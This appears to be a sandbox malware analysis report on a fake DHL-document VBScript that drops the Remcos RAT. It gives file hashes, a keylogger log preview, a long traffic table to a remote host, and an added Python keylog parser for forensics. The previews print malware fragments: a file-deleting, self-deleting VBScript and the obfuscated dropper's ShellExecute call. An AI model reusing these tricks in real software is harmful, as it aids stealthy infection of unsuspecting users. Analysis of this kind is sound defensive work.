                                        Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.w.i.n.d.o.w.s. .m.a.i.l.\.w.a.b...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:Qn:Qn
                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                        Malicious:false
                                        Preview:..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):478448
                                        Entropy (8bit):5.980068053888083
                                        Encrypted:false
                                        SSDEEP:6144:BvBeICCYQwzXKYWutZNqumC3gou/xKJP7aDC0qTDwfhbdUhTi8CRsYKNIJBw:9MPCrGXjWmL/3Hu47au1TGqi9RvJBw
                                        MD5:710644F1295D73AF29B91F191549635E
                                        SHA1:DA74950F94B693C273E3E3F95ED6366AA68A93F0
                                        SHA-256:5595275FB9355E5017A7033452DB54826C0EF829573B16EAF4E30E32473B903B
                                        SHA-512:63ECD9F46403895429E53F32BF9EAA00A48ABFABF215614E38754287040079688287CDF7F6ECCA8236EE5F7B97D22173F27ABFDA0FF01E4A785B1452ADDABEC2
                                        Malicious:false
                                        Preview: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
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):336
                                        Entropy (8bit):3.357735783530425
                                        Encrypted:false
                                        SSDEEP:6:6lVdNyU5YcIeeDAlMlVdNyIbWAAe5UlVdN7/wR1SlVdNelnAbWAv:6lVyUecmlVyIbWFe5UlV/lVelAbW+
                                        MD5:C2861AF443539E4BF998B7514A4634DD
                                        SHA1:C4B19C57E22BBF9E583DCA263B31E4B6FDF31899
                                        SHA-256:05883416D8B9B7FBAFB4950ABA92DDED042188A77BF4510B56BEA9C62B5E06F8
                                        SHA-512:5B90B5ECEC94CE79A60E568584A301BDC8EB708B37732684D1E0BBAB6F087A2D0A570347FFBB006BA82D9C94EC86994F6130C2B57827219DEB40CD2203D91AB2
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kpburtts.dat, Author: Joe Security
                                        Preview:....[.2.0.2.4./.0.7./.0.1. .1.0.:.1.9.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.0.1. .1.0.:.1.9.:.5.4. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.7./.0.1. .1.0.:.1.9.:.5.9. .R.u.n.].........[.2.0.2.4./.0.7./.0.1. .1.0.:.2.0.:.0.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
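The kpburtts.dat file above is the Remcos offline keylogger log: UTF-16LE text with CRLF line terminators, a timestamped bracketed entry each time the foreground window changes, and the raw keystrokes in between with special keys written in brackets (the preview shows [Win] followed by r, then the Run dialog gaining focus). The following Python helper is an added example and is not part of the Joe Sandbox report or of Remcos; it decodes such a log and groups keystrokes under the window that had focus. The sample bytes are constructed here to mirror the preview, and the entry grammar is an assumption inferred from that preview rather than a documented format.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample mirroring the kpburtts.dat preview above: UTF-16LE,
# CRLF line terminators, no BOM (the report classified the file as "data").
# Built inline so the parser runs offline; it is not the dropped file itself.
SAMPLE_LOG = (
    "\r\n"
    "[2024/07/01 10:19:54 Offline Keylogger Started]\r\n\r\n"
    "[2024/07/01 10:19:54 Program Manager]\r\n"
    "[Win]r\r\n"
    "[2024/07/01 10:19:59 Run]\r\n"
    "cmd[Enter]\r\n"
    "[2024/07/01 10:20:03 Program Manager]\r\n"
).encode("utf-16-le")

# Assumed entry grammar, inferred from the preview rather than from any Remcos
# documentation: a window-focus entry is "[YYYY/MM/DD HH:MM:SS <window title>]";
# every other line is raw keystrokes with special keys written in brackets.
TS_ENTRY = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.*)\]$")
SPECIAL_KEY = re.compile(r"\[([A-Za-z0-9 ]+)\]")
SESSION_MARKER = "Offline Keylogger Started"


@dataclass
class WindowActivity:
    time: str        # timestamp of the focus change, as logged (victim-local clock)
    window: str      # foreground window title
    keys: str = ""   # keystrokes logged while this window had focus


def decode_keylog(raw: bytes) -> List[str]:
    """Decode a UTF-16LE log (BOM optional) into its non-empty lines."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    text = raw.decode("utf-16-le", errors="replace")
    return [line for line in text.split("\r\n") if line.strip()]


def parse_keylog(raw: bytes) -> List[WindowActivity]:
    """Group keystrokes under the window that had focus when they were typed."""
    activity: List[WindowActivity] = []
    current: Optional[WindowActivity] = None
    for line in decode_keylog(raw):
        match = TS_ENTRY.match(line)
        if match:
            time, title = match.groups()
            if title == SESSION_MARKER:
                current = None  # start of a logging session, not a window
                continue
            current = WindowActivity(time=time, window=title)
            activity.append(current)
        elif current is not None:
            current.keys += line  # keystrokes logged before any window entry are dropped
    return activity


def special_keys(keys: str) -> List[str]:
    """Bracketed special keys in a keystroke string, e.g. ['Win'] for '[Win]r'."""
    return SPECIAL_KEY.findall(keys)


def typed_text(keys: str) -> str:
    """Printable keystrokes with bracketed special keys removed.

    The log format does not escape a literal '[' typed by the victim, so a
    typed bracket can be mistaken for a special key; treat this as best effort.
    """
    return SPECIAL_KEY.sub("", keys)


if __name__ == "__main__":
    for entry in parse_keylog(SAMPLE_LOG):
        print(f"{entry.time}  {entry.window!r}: {entry.keys!r}")
```

Timestamps are whatever the victim's clock said, so correlate them with the sandbox's own timeline (the Yara hit and the 10:19:54 entries here) rather than treating them as UTC. Window titles such as "Run" and the typed text are the parts worth feeding into triage: they show what the operator, or the victim, was doing while the keylogger ran.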
                                        File type:ASCII text, with very long lines (2227), with CRLF line terminators
                                        Entropy (8bit):5.336273532370536
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:DHL Shipping Document Awb & BL.vbs
                                        File size:22'730 bytes
                                        MD5:af8e905368962cfb4873c41a77b4515c
                                        SHA1:577337de5d106e6b11225be7c362f33a8d5c0831
                                        SHA256:bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
                                        SHA512:8fca68d732a9db1a4a6d9b955a361a5bd37bdd7c994e9094b31799cc7c4c6448fc620d2bf8928532a261680c78e8e138f0b960d9fa630dfc0b4e51c7e756a9c2
                                        SSDEEP:384:KlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwfEa+MCq22HX:6zSR022X/523S0e8xPPmra+Mq01N
                                        TLSH:09A21AF0CE4B3119CB5B3ED69C6948815AF59046823128B5E6ED0BED6383C5CD3FAD98
                                        File Content Preview:Function Fusionsdatoernes....Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe
                                        Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 16:19:06.169537067 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.169596910 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.169867992 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.190541029 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.190574884 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.702172041 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.702255964 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.705897093 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.705909967 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.706182957 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.712649107 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.760499954 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.840528011 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.840554953 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.840619087 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.840645075 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.860399008 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.860464096 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.860474110 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.903445959 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.929949999 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.929972887 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.930135012 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.931009054 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.931016922 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.931083918 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.949573994 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.949584961 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.949628115 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.949635983 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.949681044 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.949700117 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:06.949731112 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:06.949752092 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.019558907 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.019639015 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.019774914 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.019836903 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.020814896 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.020879030 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.021172047 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.021235943 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.021771908 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.021838903 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.022970915 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.023039103 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.038703918 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.038788080 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.038861990 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
Jul 1, 2024 16:19:07.038924932 CEST | 49707 | 443 | 192.168.2.9 | 192.185.112.252
Jul 1, 2024 16:19:07.108328104 CEST | 443 | 49707 | 192.185.112.252 | 192.168.2.9
                                        Jul 1, 2024 16:19:07.108417988 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.108715057 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.108787060 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.109067917 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.109143972 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.109709978 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.109781027 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.110066891 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.110326052 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.110968113 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.111027002 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.127542019 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.127618074 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.127990961 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.128060102 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.128703117 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.128767967 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.128813982 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.128865004 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.197971106 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.198059082 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.198112011 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.198168039 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.198369026 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.198446989 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.198997021 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199042082 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199074030 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199084997 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199099064 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199124098 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199439049 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199496031 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199508905 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199513912 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199536085 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199563026 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.200208902 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.200289965 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.200457096 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.200516939 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.201040983 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.201113939 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.201402903 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.201478958 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.217449903 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.217520952 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.217531919 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.217540979 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.217571974 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.217571974 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.217593908 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.217598915 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.217628002 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.217658997 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.218192101 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.218257904 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.218354940 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.218409061 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.286338091 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.286417007 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.287075996 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.287147999 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.287379980 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.287442923 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.287724972 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.287791014 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.287987947 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.288052082 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.288445950 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.288494110 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.288506031 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.288513899 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.288544893 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.288544893 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.288953066 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.288994074 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.289011955 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.289019108 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.289047003 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.289066076 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.289346933 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.289395094 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.289417028 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.289422989 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.289438009 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.289462090 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.289964914 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.290029049 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.305666924 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.305742979 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.305921078 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.305980921 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.306215048 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.306284904 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.306431055 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.306488991 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.307147026 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.307212114 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.375423908 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.375497103 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.375642061 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.375710964 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.375854969 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.375912905 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.375920057 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.375931025 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.375973940 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.381864071 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:50.795048952 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:50.795097113 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:50.795182943 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:50.802673101 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:50.802686930 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.342308044 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.342480898 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.392409086 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.392462969 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.393488884 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.393577099 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.395967960 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.440505981 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.520539999 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.520585060 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.520610094 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.520642042 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.520656109 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.520688057 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.540029049 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.540111065 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.613497019 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.613574982 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.614192963 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.614253998 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.615143061 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.615200043 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.680079937 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.680160046 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.706454992 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.706537962 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.706593037 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.706653118 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.707345963 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.707401991 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.708204031 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.708262920 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.709116936 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.709235907 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.710158110 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.710215092 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.726908922 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.726982117 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.774698973 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.774837971 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.799395084 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.799525023 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.799658060 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.799715042 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.799871922 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.799935102 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.800380945 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.800437927 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.800761938 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.800826073 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.801455975 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.801516056 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.802037954 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.802098036 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.802541971 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.802602053 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.802774906 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.802833080 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.803437948 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.803498030 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.821324110 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.821403980 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.821429968 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.821448088 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.821470976 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.821490049 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.821603060 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.821654081 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.821917057 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.821980000 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:51.868088961 CEST44360918192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:51.868295908 CEST60918443192.168.2.9192.185.112.252
